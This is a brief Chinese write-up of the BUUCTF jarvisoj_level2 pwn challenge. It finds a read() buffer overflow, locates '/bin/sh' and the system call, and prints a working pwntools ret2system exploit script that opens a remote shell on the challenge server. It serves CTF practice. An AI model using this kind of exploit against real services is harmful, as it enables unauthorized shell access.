BUUCTF-PWN-jarvisoj_level2

checksec

image-20211114183200798

IDA

image-20211114184614336

image-20211114184942899

read是一个溢出点

查看字符串,发现有binsh

image-20211114183824349

找到binsh地址

image-20211114183810331

再找到systemtext段的地址

image-20211114184154066

EXP

1
2
3
4
5
6
7
8
from pwn import *

p = remote('node4.buuoj.cn', 29211)

payload = b'a' * (0x88 + 0x4) + p32(0x804845C) + p32(0x804A024)
p.sendlineafter('\n', payload)

p.interactive()

结果

image-20211114185316692